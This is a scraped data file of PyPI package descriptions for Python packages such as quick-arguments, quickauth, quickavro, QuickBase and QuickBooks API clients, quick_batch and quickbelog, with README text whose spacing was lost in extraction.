argumentsmain.pyimportyamlimportquickargswithopen(\"config.yaml\")asf:config=yaml.load(f,Loader=quickargs.YAMLArgsLoader)Deeply nested arguments are no problemconfig.yamlkey1:key2:key3:key4:valueOverride nested argument using dot notation:python main.py--key1.key2.key3.key4=other_value{'key1': {'key2': {'key3': {'key4': 'other_value'}}}}Of course it is fine to just call your program without any command line argumentsHappy with the default values in config file:python main.py{'key1': {'key2': {'key3': {'key4': 'value'}}}}Most yaml types, including sequences are supportedconfig.yamlthresholds:[0.2,0.4,0.6,0.8,1.0]Override the thresholds:python main.py--thresholds='[0.0,0.5, 1.0]'(take care to use \u2018 \u2018 around your command line arguments if they include\nspaces){'thresholds': [0.0, 0.5, 1.0]}However, types within sequences are not enforcedconfig.yamlthresholds:[0.2,0.4,0.6,0.8,1.0]List of strings instead of list of floats does not give an error:python main.py--thresholds=[a,b,c]{'thresholds': ['a', 'b', 'c']}You can even pass references to functions or classes (your own or builtins)config.yamlfunction_to_call:!!python/name:yaml.dumpOverride with reference to built-in zip function:python main.py--function_to_call=zip{'function_to_call': }Example with all supported typesconfig.yamlan_int:3a_float:3.0a_bool:Truea_complex_number:37-880ja_date:2016-12-11sequences:a_list:[a,b,c]# for tuples you need to use square [] brackeds in the yaml and on the command line# they will still be proper tuples in the resulta_tuple:!!python/tuple[a,b]python:a_function:!!python/name:yaml.loada_class:!!python/name:yaml.loader.Loadera_module:!!python/module:contextlib# can be overwritten with any typea_none:!!python/noneOverride every single parameter in the config filepython main.py --an_int=4 --a_float=2.0 --a_bool=False --a_complex_number=42-111j --a_date=2017-01-01 \\\n --sequences.a_list=[c,b,c] --sequences.a_tuple=[b,a] --python.a_function=zip \\\n --python.a_class=yaml.parser.Parser --python.a_module=yaml --python.a_none=1234{'a_bool': False,\n 'a_complex_number': '42-111j',\n 'a_date': datetime.date(2017, 1, 1),\n 'a_float': 2.0,\n 'an_int': 4,\n 'python': {'a_class': ,\n 'a_function': ,\n 'a_module': ,\n 'a_none': None},\n 'sequences': {'a_list': ['c', 'b', 'c'], 'a_tuple': ('b', 'a')}}Currently not supportedTypesFollowing types are not supported at all:!!python/dict (because it looks just like the rest of the yaml file)!!pairsFollowing types are not enforced / objects will not be instantiated:!!python/object!!python/object/new!!python/object/applyMulti-document loadingIf the YAML file contains multiple documents, only the first document\nwill be considered. Theyaml.load_allfunctionality is not\nsupported."} +{"package": "quick-arguments", "pacakge-description": "Check out the README onGitLab!"} +{"package": "quickassert", "pacakge-description": "quickassertA Python runtime service:\nAssertion admin with generated exceptionShort Description from v.1.0 (first)Creates assertion administor (access) on relatively small prodjects, in order to save time used in raising and writing exceptions.\nIt generate automatically a one-pattern exception.Quick UseFirst, run the command:pip install quickassertWhen the installation is done, an example is:from quickassert import *\n\nentry_assert = new_assert(_global=False) # necessary to call once if AUTO_NEW_ASSERT is False\n\n# declare assertion test named digit\nentry_assert['digit'] = lambda x: 0 <= x < 10\n\n\ndef enter_digit(d: int) -> None:\n if isinstance(d, int):\n entry_assert.digit('d', d)\n print('O.K.')\n return\n raise TypeError('d must be int')where one can obtain:>>> enter_digit(4)\n>>> O.K.\n\n>>> enter_digit(23)\n>>> ValueError: d must be digitComing in following versionsBetter exception and message handling.Mode with inspection, no need to pass variable name if same (maybe with a decorator)Smallest tree checking, for optimisation, for example:\n(x > 3) & (x > 5) ~ (x > 5)Typing check adapted.And maybe more"} +{"package": "quickauth", "pacakge-description": "A quick user-password authentication for Python.InstallationpipinstallquickauthUsagefromquickauth.coreimportQuickAuthauthenticator=QuickAuth()print(authenticator.register())print(authenticator.authorize(key='fbdca934-34c0-11e9-8bb3-685b35d08286',value='579d0f25-aed1-40c4-afa8-61e11254f47e'))print(authenticator.update(key='fbdca934-34c0-11e9-8bb3-685b35d08286'))Outputs:{'key':'fbdca934-34c0-11e9-8bb3-685b35d08286','secret':'579d0f25-aed1-40c4-afa8-61e11254f47e'}True{'key':'fbdca934-34c0-11e9-8bb3-685b35d08286','secret':'974bc9bb-8839-4f0c-83b7-adc78cc3247d'}Run from terminal:python3-mquickauth.core[-h][--dbDB][-kKEY][-sSECRET]OPERATIONPositional arguments:OPERATIONregister, authorize, or updateOptional arguments:-h,--helpshow this help message and exit--dbDBdatabase file, default: auth.db-kKEY,--keyKEYkey-sSECRET,--secretSECRETsecret"} +{"package": "quickavro", "pacakge-description": "quickavroquickavro is a Python library for working with theAvrofile format. The purpose of this library is to provide a high-performance interface in Python for reading/writing Avro files. The performance of Avro has been historically very poor in Python, so quickavro makes use of a Python C extension that directly interacts with the official Avro C API. quickavro is currently alpha quality.DocumentationAPI documentation and examples can be found athttp://chrisrx.github.io/quickavro.Install$pipinstallquickavroIt is important to note, however, that untilPyPi allows binary wheels for linux,setup.pywill attempt to download and compile the dependencies when installing withpip install.Building from sourcequickavro depends upon several C libraries:Avro CJanssonSnappyThey depend upon traditional build/config tools (cmake, autoconf, pkgconfig, etc), that sometimes make compiling this a nightmare so I ended up trying something a little different here and so far it is working well.makevendormakemakeinstallThevendormake target downloads and unpacks the source files for all the libraries, while the default make targetbuild, calls Python setuptools/distutils to staticly compile these and creates aWheelbinary package. This removes the need for these libraries to be dynamically linked correctly and can trivially be packaged within the binary Wheel package without worries like if the header package has installed for the library."} +{"package": "quickbackend", "pacakge-description": "No description available on PyPI."} +{"package": "quickban", "pacakge-description": "No description available on PyPI."} +{"package": "quickbar", "pacakge-description": "A small rich TQDM cloneThe goal of this small package is to turn therich packageinto a clone oftqdm.For now, only basics are here:fromquickbarimportQuickbarforiteminQuickbar.track(iterator):# do fancy stuffprint(\"I exist !\")This is the big upside of TQDM over rich: a less cool bar, but one line is enough !"} +{"package": "quickbase2", "pacakge-description": "UNKNOWN"} +{"package": "quickbase-client", "pacakge-description": "A High-Level Quickbase Python API Client & Model GeneratorQuickbase-Client is a library for interacting with Quickbase applications through their\nRESTful JSON API (https://developer.quickbase.com/). It has features to generate model classes\nfor tables in your Quickbase app, and provides high level classes to interface between Python\nobjects and the Quickbase tables.Quick StartInstallationInstallation can be done through pip:pipinstallquickbase-clientThis will install both the libraryquickbase_client, and a command line toolqbcfor\nrunning some handy scripts.Generating your ModelsTo interact and authenticate with your Quickbase applications you need a User Token. You can read\nthe Quickbase documentationhereon how to create one.\nIt is recommended to set an environment variableQB_USER_TOKENwith this value:exportQB_USER_TOKEN=mytokenfromquickbase;Next, say you have a hypothetical Quickbase Application named MyApp athttps://foo.quickbase.com/db/abcdefthat has tables for tracking things\nagainst a repository like Issues & Pipelines.Running the following:qbcrunmodel-generate-ahttps://foo.quickbase.com/db/abcdefWould generate a directory structure likemodels\n\u251c\u2500\u2500 __init__.py\n\u2514\u2500\u2500 my_app\n \u251c\u2500\u2500 __init__.py\n \u00a0\u00a0 \u251c\u2500\u2500 app.py\n\u00a0\u00a0 \u251c\u2500\u2500 github_issue.py\n\u00a0\u00a0 \u2514\u2500\u2500 gitlab_pipeline.pyAnd classes likeGitHubIssuewhere you can interact with the data model through a Python object.Writing Records to QuickbaseClasses likeGitHubIssuethat subclassQuickbaseTablealso get a factory class-methodclient(user_tok)which creates an instance of the higher-levelQuickbaseTableClientto\nmake API requests for things related to that table:client=GitHubIssue.client(user_tok=os.environ['QB_USER_TOKEN'])new_issue=GitHubIssue(title='Something broke',# you get friendly-kwargs for fields without worrying about ID'sdescription='Please fix!',date_opened=date.today()# things like Python date objects will be serialized)response=client.add_record(new_issue)print(response.json())# all methods (except for query) return the requests Response objectQuerying Records from QuickbaseYou can also use the client object to send queries to the Quickbase API through thequerymethod. This method will serialize the data back in to a Python object. Thequerymethod on the\ntable class takes aQuickbaseQueryobject which is high level wrapper around the parameters\nneeded to make a query.Notably, thewhereparameter for specifying the query string. There is one (and in the future\nthere will be more) implementation of this which allows you to build query-strings through\nhigher-level python functions.You can use the methods exposed in thequickbase_client.querymodule like so:# convention to append an underscore to these methods to avoid clashing# with any python keywordsfromquickbase_client.queryimporton_or_before_fromquickbase_client.queryimporteq_fromquickbase_client.queryimportand_schema=GitHubIssue.schemaq=and_(eq_(schema.date_opened,schema.date_created),on_or_before_(schema.date_closed,date(2020,11,16)))print(q.where)# ({'9'.EX.'_FID_1'}AND{'10'.OBF.'11-16-2020'})recs=client.query(q)# recs will be GitHubIssue objects unless passing raw=Trueprint([str(r)forrinrecs])# ['']Controlling Lower-Level API CallsLastly, say you want to deal with just posting the specific json/data Quickbase is looking for.\nTheQuickbaseTableClientobject wraps the lower-levelQuickbaseApiClientobject which has\nmethods for just sending the actual data (with an even lower-level utilityQuickbaseRequestFactoryyou could also use). These classes manage hanging on to the user token,\nand the realm hostname, etc. for each request that is made.For example, note the signature ofqueryinQuickbaseApiClient:defquery(self,table_id,fields_to_select=None,where_str=None,sort_by=None,group_by=None,options=None):You can get to this class by going through the table client:api = client.api, or from\ninstantiating it directlyapi = QuickbaseApiClient(my_user_token, my_realm)With this, we could make the exact same request as before:api=QuickbaseApiClient(user_token='my_token',realm_hostname='foo.quickbase.com')response=api.query(table_id='abcdef',where_str=\"({'9'.EX.'_FID_1'}AND{'10'.OBF.'11-16-2020'})\")data=response.json()More Resourcesexamplesdirectory.CONTRIBUTINGLICENSEOther NotesCurrently a bunch of duplicate aliases forQuickBasetoQuickbasesince this\nwas originally released with everything prefixed asQuickBase-. But since Quickbase\nis branding more to \u201cQuickbase\u201d, this will eventually be the main naming for\nversion 1.0 in an effort to keep more consistent. So prefer to useQuickbase-prefixed classes\nas in the future the other aliases will be dropped."} +{"package": "quickbase-json-api-client", "pacakge-description": "quickbase-json-api-clientUnofficial QuickBase JSON API wrapper for Python.Created by Synctivate Developers!Custom software solutionsfrom Fredericksburg, Virginia!Documentationhttps://github.com/robswc/quickbase-json-api-client/wikiQuickstartInstallationTo install, run:pipinstallquickbase-json-api-clientInitialize ClientUse the following code to create and initialize a client object.fromquickbase_jsonimportQBClientclient=QBClient(realm=\"yourRealm\",auth=\"userToken\")WhereyourRealmis the name (subdomain) of your Quickbase Realm anduserTokenis the user token used to authenticate\nwith the realm. You can also include an optionalagent: strargument, which will change the User-Agent (used in headers) from the default \"QJAC\" to whatever string is passed. This isheavily recommended, as it makes figuring out the origin of API calls easier.Query RecordsQuerying for records is one of the most useful features of the Quickbase JSON API. Querying records with QJAC can be done\nusing the following codeBasic Exampleresponse=client.query_records(table='tableId',select=[3,6,12],where='queryString')data=response.data()WheretableIdis the ID of the table you wish to query from,fidsis a list of field IDs you wish to receive andqueryStringis a quickbasequery string.Adv. Examplefromquickbase_json.helpersimportWhere# have static fids for table/recordsNEEDED_FIDS=[3,6,12]# build query str where 3 is either 130, 131 or 132# https://help.quickbase.com/api-guide/componentsquery.htmlq_str=Where(3,'EX',[130,131,132]).build(join='OR')response=client.query_records(table='tableId',select=NEEDED_FIDS,where=q_str)In this example, we use theWhere()helper. This can make building complexQuickBase querieseasier.TheWhere()helper documentation can be foundhere.Response ObjectsAQBResponseobject is returned when querying records with QJAC. AQBResponsehas several methods that make\nhandling returned data easier. Here are a few of the most useful ones.Response Methods.data()r=qbc.query_records(...).data()Returns the data from QuickBase. Equivalent to calling.get('data').denest()r=qbc.query_records(...).denest()Denests the data. I.e. changes{'fid': {'value': 'actualValue'}}to{'fid': 'actualValue'}orient(orient: str, key: int)r=qbc.query_records(...).orient('records',key=3)Orients the data. Currently, the only option is 'records'. This will orient the returned data into a \"record like structure\", i.e. changes{'fid': 'actualValue', 'fid': 'actualValue'}to{'key': {etc: etc}}convert()r=qbc.query_records(...).convert('datetime')Converts the data, based on fields and provided arguments. For example, callingconvert('datetime')will convert all data with fields\nof the 'date time' type to python datetime objects. Other conversions are 'currency' and 'int'.round_ints()r=qbc.query_records(...).round_ints()Rounds all float integers into whole number ints. i.e. converts55.0to55.Additional FeaturesInformation on additional features that go beyond the scope of an introduction README.md, can be found on theGitHub Wiki!This include things like...Easy file uploading/downloadingInserting, Updating and Deleting recordsCreating tablesAuthenticating w/Quickbaseetc.Issues/BugsIf you come across any issues or want to file a bug report, please do sohere.Thanks!"} +{"package": "quickbase-model-maker", "pacakge-description": "quickbase-model-makerA lightweight tool for creating and managing QuickBase models!Turn this\ud83d\udc4e# select relevant infoselect=[3,43,23,63,21,52,24,54]Into this\ud83d\udc4dfromreferences.order_managerimportOrderselect=[Order.RECORD_ID,Order.ORDER_TYPE,Order.ORDER_NUMBER,Order.DELIVERY_DATE...]With just a few lines of code!Installationpipinstallquickbase-model-makerUsageInitializingThe sample code below will initialize your models for use in your application. Models are created within their respective app folders, in a new directory calledreferences.# import model makerfromquickbase_model_makerimportModelMaker# create model maker with realm and auth infoqmm=ModelMaker(realm='realm',auth='AUTH-TOKEN')# register tables you wish to create models fromqmm.register_tables([('bqs5asdf','bqs5aser'),# ('app_id', 'table_id') tuples('bqs5abzc','brzaners'),('bqs5abzc','brzanvac'),('bqs5abzc','bqs5wers'),])Generate your models, based off of the registered tables, with the.sync()method.# call sync method to create modelsqmm.sync(only_new_tables=True)Optionally, you can sync all registered tables, regardless of whether they have already been synced.\nIt is recommended to call.sync()only when you wish to re-generate models, aseach model sync with Quickbase costs 1 API call. You only have to generate\nmodels once - or when you wish to update your models (i.e. new field you need to access added on quickbase). Calling.sync()on\nevery script runcould result in a large number of API calls.qmm.sync()In codeOnce registered and created, models can be used in your application.The following code uses a fictional \"Order\" model to demonstrate\nhow one can access theORDER_TYPEfield. One can also access useful metadata\nthrough methods like.table_id()and.app_id().fromreferences.ordersimportOrderprint(Order.ORDER_TYPE)print(Order.table_id())Removing ModelsModels can easily be removed by doing the following:Remove the model from thereferences/appdirectoryRemove the related table from thereferences/__init__.pyfile.Remove the related table tuple from the.register_tables()method."} +{"package": "quickbase-quickbooks", "pacakge-description": "No description available on PyPI."} +{"package": "quick-batch", "pacakge-description": "quick_batchquick_batchis an ultra-simple command-line tool for large batch python-driven processing and transformation. It was designed to be fast to deploy, transparent, and portable. This allows you to scale anyprocessorfunction that needs to be run over a large set of input data, enabling batch/parallel processing of the input with minimal setup and teardown.quick_batchGetting startedUsageScalingInstallationTheprocessor.pyfileWhy use quick_batchGetting startedAll you need to scale batch transformations withquick_batchis atransformation function(s) in aprocessor.pyfileDockerfilecontaining a container build appropriate to y our processoran optionalrequirements.txtfile containing required python modulesDocument paths to these objects as well as other parameters in aconfig.yamlconfig file of the form below.Underprocessoryou can either define adockerfile_pathto your Dockerfile or animage_nameto a pre-built image to be pulled.data:input_path:/path/to/your/input/dataoutput_path:/path/to/your/output/datalog_path:/path/to/your/log/filequeue:feed_rate:order_files:processor:dockerfile_path:/path/to/your/Dockerfile ORimage_name:requirements_path:/path/to/your/requirements.txtprocessor_path:/path/to/your/processor/processor.pynum_processors:quick_batchwill point yourprocessor.pyat theinput_pathdefined in thisconfig.yamland process the files listed in it in parallel at a scale given by your choice ofnum_processors.Output will be written to theoutput_pathspecified in the configuration file.You can see theexamplesdirectory for examples of valid configs, processors, requirements, and dockerfiles.UsageTo start processing with yourconfig.yamlusequick_batch'sconfigcommand at the terminal by typingquick_batchconfig/path/to/your/config.yamlThis will start the build and deploy process for processing your data as defined in yourconfig.yaml.ScalingUse thescalecommoand to manually scale the number of processors / containers running your processquick_batchscaleHereis an integer >= 1. For example, to scale to 3 parallel processors / containers:quick_batch scale 3InstallationTo install quick_batch, simply usepip:pipinstallquick-batchTheprocessor.pyfileCreate aprocessor.pyfile with the following basic pattern:import...defprocessor(todos):forfile_nameintodos.file_paths_to_process:# processing codeThetodosobject will carry infeed_ratenumber of file names to process in.file_paths_to_process.Note: the function nameprocessoris mandatory.Why use quick_batchquick_batch aims to bedead simple to use:versus standard cloud service batch transformation services that require significant configuration / service understandingultra fast setup:versus setup of heavier orchestration tools likeairflowormlflow, which may be a hinderance due to time / familiarity / organisational constraints100% portable:- use quick_batch on any machine, anywhereprocessor-invariant:quick_batch works with arbitrary processes, not just machine learning or deep learning tasks.transparent and open source:quick_batch uses Docker under the hood and only abstracts away the not-so-fun stuff - including instantiation, scaling, and teardown. you can still monitor your processing using familiar Docker command-line arguments (likedocker service ls,docker service logs, etc.)."} +{"package": "quickBayes", "pacakge-description": "This package provides code for a Bayesian workflow. The two options are model selection and grid search. This package replaces quasielasticbayes. An application of this package is to fit quasi-elastic neutron scattering data in Mantid (https://www.mantidproject.org)"} +{"package": "quickbe", "pacakge-description": "Quick back-endWhat is QuickbeQuickbe is a Python library that enables you to deliver quick back-end components.\nIf you are a technical founder or a developer, use this package to build everything you need to launch and grow high-quality SaaS application.\nEvery SaaS application needs these componentsMicro-servicesWeb-services or APIsWeb-hooks receiversCentral vaultWhy PythonIt has a strong community, it is fast to learn, it has lots of tools to process and analyze data ... and data is a major key for building a good app :-)Web serverDevelop your endpoint as functions with annotations for routing and validation.@endpoint(path='hello', validation={'name': {'type': 'string', 'required': True}})\ndef say_hello(session: HttpSession):\n name = session.get_parameter('name')\n if name is None:\n name = ''\n return f'Hello {name}'Run them using Flask or as AWS Lambda function without any changes to your code.Build in endpoints/health- Returns 200 if every thing is OK (e.g:{\"status\":\"OK\",\"timestamp\":\"2022-07-25 06:18:54.214674\"})//set_log_level/- Set log level//quickbe-server-info- Get verbose info on the server (endpoints and packages)//quickbe-server-status- Get server status (uptime, memory utilization, request per seconds and log info)//quickbe-server-environ- Get all environment variables keys and values"} +{"package": "quickbelog", "pacakge-description": "Quick using loggerThis small project purpose is to add nice and clean logs to your app.\nJust import thequickbelog.Logclass wherever you need and start using it.\nTo make debugging easier by default it will include the name of the source file and line number in order to understand what code line is responsible for the output.Usage:from quickbelog import Log\n\nLog.info(msg='This is an info message')\nLog.debug(msg='This is a debug message')\nLog.warning(msg='This is a warning message')\nLog.error(msg='This is an error message')\ntry:\n raise ValueError('Just for testing')\nexcept ValueError:\n quickbe.Log.exception('Something failed')Output2022-03-14 15:54:03,411 > INFO test_logger.py(17) method: test_basic_log_message This is an info message\n2022-03-14 15:54:03,411 > DEBUG test_logger.py(21) method: test_debug_message This is a debug message\n2022-03-14 15:54:03,411 > WARNING test_logger.py(29) method: test_warning_message This is a warning message\n2022-03-14 15:54:03,412 > ERROR test_logger.py(33) method: test_error_message This is an error message\n2022-03-14 15:54:03,412 > ERROR test_logger.py(13) method: test_exception_logging Something failed\nTraceback (most recent call last):\n File \".\\test_logger.py\", line 11, in test_exception_logging\n raise ValueError('Just for testing')\nValueError: Just for testingHave fun :-)"} +{"package": "quickbeserverless", "pacakge-description": "quickbeserveless"} +{"package": "quickbeutils", "pacakge-description": "Quick using loggerAll sorts of utilitiesSending emailsSending Slack messages and filesWork with environment variablesConvert time to human formatRetry mechanism"} +{"package": "quickbite", "pacakge-description": "QuickBite: Recipe GeneratorModern Data Structures - Fall 2023Columbia University QMSSHafsah T. ShaikAboutQuickBite is a Python-based command-line application that generates cooking recipes based on user-inputted ingredients. It aims to promote cooking with available resources, reduce food waste, and simplify meal planning by utilizing data from various recipe and nutritional databases.This project is the final project for the Modern Data Structures class at Columbia University for Fall 2023.FeaturesFetch and display recipes from a vast collection using the Spoonacular API.Gather and present nutritional data for ingredients using the Edamam API.Generate recipes based on user-provided ingredients and dietary preferences.Offer the ability to exclude certain ingredients from the recipe search.Provide summary statistics about the recipes such as calorie count and preparation time.InstallationTo install QuickBite, you will need Python 3.8 or later.From PyPIOnce QuickBite is available on PyPI, you can install it using pip:pipinstallquickbiteFor DevelopmentIf you wish to install QuickBite for development purposes, follow these steps:Clone the repository:gitclonehttps://github.com//QuickBite.gitNavigate to the project directory:cdQuickBiteInstall the package along with its dependencies:poetryinstallThis will create a virtual environment with all the necessary dependencies installed.UsageTo use QuickBite, run the following command in your terminal:quickbiteYou will be prompted to enter the ingredients you have on hand, separated by commas:Enter ingredients you have, separated by commas (e.g., eggs, flour, sugar):Next, you can specify any ingredients you wish to exclude from the recipe suggestions:Enter ingredients you want to exclude, separated by commas (e.g., nuts, dairy):QuickBite will then display a list of recipes that match your ingredients, and you can select one to see more details, including the recipe's nutritional information and a list of all needed ingredients.Here's an example of command usage:$ quickbite\nWelcome to the Recipe Generator!\n\nEnter ingredients you have, separated by commas (e.g., eggs, flour, sugar): chicken, rice\n\nEnter ingredients you want to exclude, separated by commas (e.g., nuts, dairy):\n\nSearching for recipes...\n\nAvailable recipes:\n1. Chicken and Rice Casserole\n2. Spicy Chicken Stir Fry\n3. Simple Chicken Biryani\n4. Chicken Fried Rice\n\nEnter the number of the recipe to get more information, or 'exit' to finish: 2\n\nFetching details for recipe: Spicy Chicken Stir Fry...\n\nNutritional Information:\nCalories: 300\nProtein: 25g\n...\n\nIngredients List:\n- Chicken breast: 2 pieces\n- Rice: 1 cup\n- Bell pepper: 1\n- ...\n\nWould you like to start over? (yes/no): noDevelopment SetupTo set up a development environment for QuickBite:Clone the repository:gitclonehttps://github.com//QuickBite.gitNavigate to the project directory:cdQuickBiteInstall dependencies using Poetry:poetryinstallActivate the virtual environment:poetryshellSet up environment variables:\nCopy.env.exampleto.envand populate it with your API keys.FunctionsThe application includes the following defined functions:search_recipes_by_ingredients: Search for recipes based on a list of ingredients.search_recipes_excluding_ingredients: Filter recipes by excluding certain ingredients.get_nutritional_data: Retrieve nutritional information for a given ingredient.get_recipe_details: Fetch detailed information about a specific recipe.get_user_ingredients: Interactively get ingredients from the user.get_user_exclusions: Interactively get ingredient exclusions from the user.display_recipes: Display a list of recipes to the user.print_ingredients_list: Print out a formatted list of ingredients.get_ingredients_for_recipe: Extract and format ingredients for a specific recipe.format_nutritional_data: Format and display nutritional data.Challenges Faced and SolutionsThroughout the development of QuickBite, several technical challenges were encountered:API Rate Limiting: Both Spoonacular and Edamam APIs have rate limits which initially hindered the ability to collect large amounts of data continuously. To overcome this, I implemented a caching system that stores API responses, thereby reducing the number of necessary calls for repeated data requests.Data Inconsistency: The data retrieved from the APIs had inconsistencies in formatting, especially with units of measurement for ingredients. I created a normalization function that standardizes the units and formats the ingredient data into a consistent structure.Error Handling: Various exceptions and errors such as timeouts and HTTP errors were frequent during API interaction. I utilized try-except blocks to handle these exceptions gracefully and ensure the application could continue running without crashing.Environment Management: Managing API keys securely while allowing the application to be used on different machines was a concern. I used environment variables to handle API keys, making the application more secure and portable.These challenges were met with a focus on robustness and user experience, ensuring that the final product was not only functional but also reliable and easy to use.ContributingContributions are welcome. Please open an issue to discuss your ideas or submit a Pull Request.LicenseQuickBite is open-sourced under the MIT License, which provides a permissive free software license that allows for reuse within proprietary software provided all copies of the licensed software include a copy of the MIT License terms and the copyright notice.For the full license text, see theLICENSEfile.AcknowledgementsThis project is submitted as a part of the final coursework for the Modern Data Structures class under the guidance of Dr. Thomas Brambor, Columbia University QMSS, Fall 2023.Data provided by:Spoonacular APIEdamam API"} +{"package": "quickboard", "pacakge-description": "QuickboardA simple Python package for creating quick, modular dashboardsOverviewQuickboard is a collection of Python classes and utilities for making scalable dashboards. Built on top ofDashandPlotly, Quickboard provides\nan assortment of tools and pre-made components to mix and match, achieving a balance between ease-of-use and\ncustomizability.The following example was made using Quickboard.The Quickboard package contains three subpackages of interest for developing dashboards:base - the core components used to make the backbone of the dashboard,plugins - highly customizable add-ons to augment your other components,(EXPERIMENTAL) textboxes - components for having dynamically updated text.More details on using these can be foundbelow.Install GuideTo install, simply runpip install quickboardin your virtual environment.UsageOnce you have some datasets you'd like to visualize and present with a dashboard, you can start making\nQuickboard components to achieve this purpose. Check out theComponent Galleryto see what\nyou can create with just a few lines of code.Once you have a few components you'd like to put together into a larger app, or to take advantage of using tab-level\nplugin interactions, you can use a few of the other Quickboard classes to achieve this. The general layout of a full\nQuickboard consists of:aQuickboardobject to hold everything together;a (n optional) list ofBaseTabobjects to organize visuals into tabs;aSidebarcalibrated to hold differentpluginsbased on the current tab.Within each tab, we havevariousContentGridobjects to display other components in a grid, with customizable column wrapping length;differentDynamicPanelobjects, materialized in the form of aPlotPanelorDataPanel, which house the\nprimary data displays, updatable via the sidebar plugins and other panel specificControlPluginobjects.Understanding how to compose and mix these components will allow for a huge variety in producible dashboards. For more\ninfo on how to use them, check out the docstrings (e.g.help(ContentGrid)) or see theGuided Example."} +{"package": "quickbolt", "pacakge-description": "QuickboltAsynchronously make and validate requests!This was forked fromapi-automation-tools.Table of contentsInstallationUsagePytestAsync requests with aiohttp or httpxAsync calls with grpcValidationsExamplesProject structureInstallation$pipinstallquickboltUsagePytestThe CorePytestBase loadsjsonfiles fromcredentialsanddatafolders during setup. Validations and reporting are performed during the teardown.Async requests with aiohttp or httpxMake single or batched style async requests using aiohttp or httpx. Each request method call will generate a csv containing useful data about the request(s). The usual request arguments of aiohttp and httpx are supported.There's a nifty function calledgenerate_batchthat'll intake valid (200 type) request information and return a list of corruptions for execution.fromquickbolt.clientsimportAioRequests,HttpxRequestsaiohttp_requests=AioRequests()httpx_requests=HttpxRequests()batch={'method':'get','headers':{...},'url':'...'}response=aiohttp_requests.request(batch)response=httpx_requests.request(batch)orbatch=[{'method':'get','headers':{...},'url':'...'},{...},...]responses=aiohttp_requests.request(batch)responses=httpx_requests.request(batch)orfromquickbolt.batch_generationimportgenerate_batchbatch=generate_batch(\"get\",...)responses=aiohttp_requests.request(batch)responses=httpx_requests.request(batch)Note: Both clients have an awaitable request method called async_request e.g.await aiohttp_requests.async_request(...)orawait httpx_requests.async_request(...).Note: You can indicate where the batch generator will start looking for path parameters by placing asemicolon (;)where the path parameters start (before a/) e.g.https://httpbin.org/get;/param/value.Async calls with grpcMake single or batched style async calls using grpc. Each call method call will generate a csv containing useful data about the call(s).Seeherefor a quick tutorial on the mechanics of making grpc calls.fromquickbolt.clientsimportAioGPRCfromtests.client.gprc.serversimporthelloworld_pb2,helloworld_pb2_grpcaio_grpc=AioGPRC()options={\"address\":\"localhost:50051\",# the address of the server\"stub\":helloworld_pb2_grpc.GreeterStub,# the stub class reference of the service\"method\":\"SayHello\",# the service method to call\"method_args\":helloworld_pb2.HelloRequest(name=\"Quickbolt\"),# the args the service method accepts}responses=awaitpytest.aio_grpc.call(options)Note: Generate batch is not supported for async grpc calls.ValidationsAfter eachrequest, a scrubbed copy of the csv history of the execution will be generated. This file (or the original) can be used to validate against executions over time. These files will have the same name as the running test, just with thecsvextenstion instead. Any mismatches can be raised as errors and are reported in a separate csv. Historical csv files to be used as reference can be stored in a validations folder at the root level.fromquickbolt.validationsimportValidations...requestsweremadeandcsvfilesweregenerated...validations=Validations()mismatches=awaitvalidations.validate_references(actual_refs={...})mismatches=>[{\"values\":[{\"key\":\"ACTUAL_CODE\",\"d1\":\"404\",\"d2\":\"999\"},...],\"keys\":[...],\"skipped_keys\":[...],\"actual_refs\":{...},\"expected_refs\":{...},\"unscrubbed_refs\":{...},},{...},]ExamplesAn example of a test -test_get.pyAn example of a base class showing a setup and teardown -some_pytest_base.pyAn example of the scrubbed csv report file generated from running the test -get_scrubbed.csvProject structureThis package requires the following base structure for the project..\n\u251c\u2500\u2500 credentials # Optional - credentials\n\u2502 \u2514\u2500\u2500 credentials.json # Optional - credentials as json\n\u251c\u2500\u2500 tests # Required - test files\n\u2502 \u251c\u2500\u2500 data # Optional - test data\n\u2502 \u2502 \u2514\u2500\u2500 data.json # Optional - test data as json\n\u2502 \u2514\u2500\u2500 test_some_request.py # Required - pytest test\n\u2514\u2500\u2500 validations # Optional - validation data\n \u2514\u2500\u2500 some_request.json # Optional - validation data as json. the validation files \n directory structure must match the structure of the tests in the tests folder."} +{"package": "quickbooks-desktop", "pacakge-description": "quickbooks_desktopA Python 3 library for QuickBooks Desktop API.The purpose of the project is to make QuickBooksDesktop more accessible in Python. This libraryuses QBXML instead of QBFC.Python 32 Bit vs. 64 BitUntil 2022, QuickBooks was a 32 bit program. Becauseof this, you will need to use a 32 bit version of Python.In 2022 QuickBooks did upgrade to 64 bit so if you're usingQuickBooks version 2022 (or 22.0 for Enterprise) thena 64 bit version of Python may work.InstructionsThis package will handle all the complexities of dealing withSession Manager.Getting HelpFor a look at xml code you can go to QuickBooksOnscreen ReferenceDiscussion and DevelopmentMost development discussions take place on GitHub in this repo."} +{"package": "quickbooks-pinecone", "pacakge-description": "python-quickbooksA Python 3 library for accessing the Quickbooks API. Fork ofpython-quickbooksThese instructions were written for a Django application. Make sure to\nchange it to whatever framework/method you\u2019re using.\nYou can find additional examples of usage inIntegration tests folder.For information about contributing, see theContributing Page.QuickBooks OAuthThis library requiresintuit-oauth.\nFollow theOAuth 2.0 Guidefor installation and to get connected to QuickBooks API.Accessing the APISet up an AuthClient passing in yourCLIENT_IDandCLIENT_SECRET.fromintuitlib.clientimportAuthClientauth_client=AuthClient(client_id='CLIENT_ID',client_secret='CLIENT_SECRET',environment='sandbox',redirect_uri='http://localhost:8000/callback',)Then create a QuickBooks client object passing in the AuthClient, refresh token, and company id:fromquickbooksimportQuickBooksclient=QuickBooks(auth_client=auth_client,refresh_token='REFRESH_TOKEN',company_id='COMPANY_ID',)If you need to access a minor version (SeeMinor versionsfor\ndetails) pass in minorversion when setting up the client:client=QuickBooks(auth_client=auth_client,refresh_token='REFRESH_TOKEN',company_id='COMPANY_ID',minorversion=4)Object OperationsList of objects:fromquickbooks.objects.customerimportCustomercustomers=Customer.all(qb=client)Note:The maximum number of entities that can be returned in a\nresponse is 1000. If the result size is not specified, the default\nnumber is 100. (SeeIntuit developer guidefor details)Filtered list of objects:customers=Customer.filter(Active=True,FamilyName=\"Smith\",qb=client)Filtered list of objects with ordering:# Get customer invoices ordered by TxnDateinvoices=Invoice.filter(CustomerRef='100',order_by='TxnDate',qb=client)# Same, but in reverse orderinvoices=Invoice.filter(CustomerRef='100',order_by='TxnDate DESC',qb=client)# Order customers by FamilyName then by GivenNamecustomers=Customer.all(order_by='FamilyName, GivenName',qb=client)Filtered list of objects with 